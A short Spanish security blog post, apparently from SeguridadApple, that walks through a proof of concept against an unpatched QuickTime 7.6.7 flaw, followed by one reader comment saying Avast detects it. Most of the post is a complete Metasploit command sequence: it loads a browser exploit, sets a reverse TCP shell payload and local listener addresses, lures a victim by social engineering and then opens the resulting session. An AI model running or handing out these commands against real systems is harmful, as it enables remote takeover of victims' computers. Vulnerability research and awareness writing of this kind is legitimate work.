En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).
Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:
- use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
- set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
- set SRVPORT 80 (Puerto local del servicio)
- set URIPATH juegos (Uri del servicio)
- set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
- set LHOST 192.168.0.162 (IP donde se conectará la víctima)
- set LPORT 5050 (Puerto local de escucha)
- exploit (Ejecutamos el exploit)
Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.
Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.
Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:
- sessions -i 2
Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.
Autor: SeguridadApple
Fuente: http://www.seguridadapple.com/
El antivirus Avast 4.8 detecta el ataque, así que no funciona...
ResponderEliminar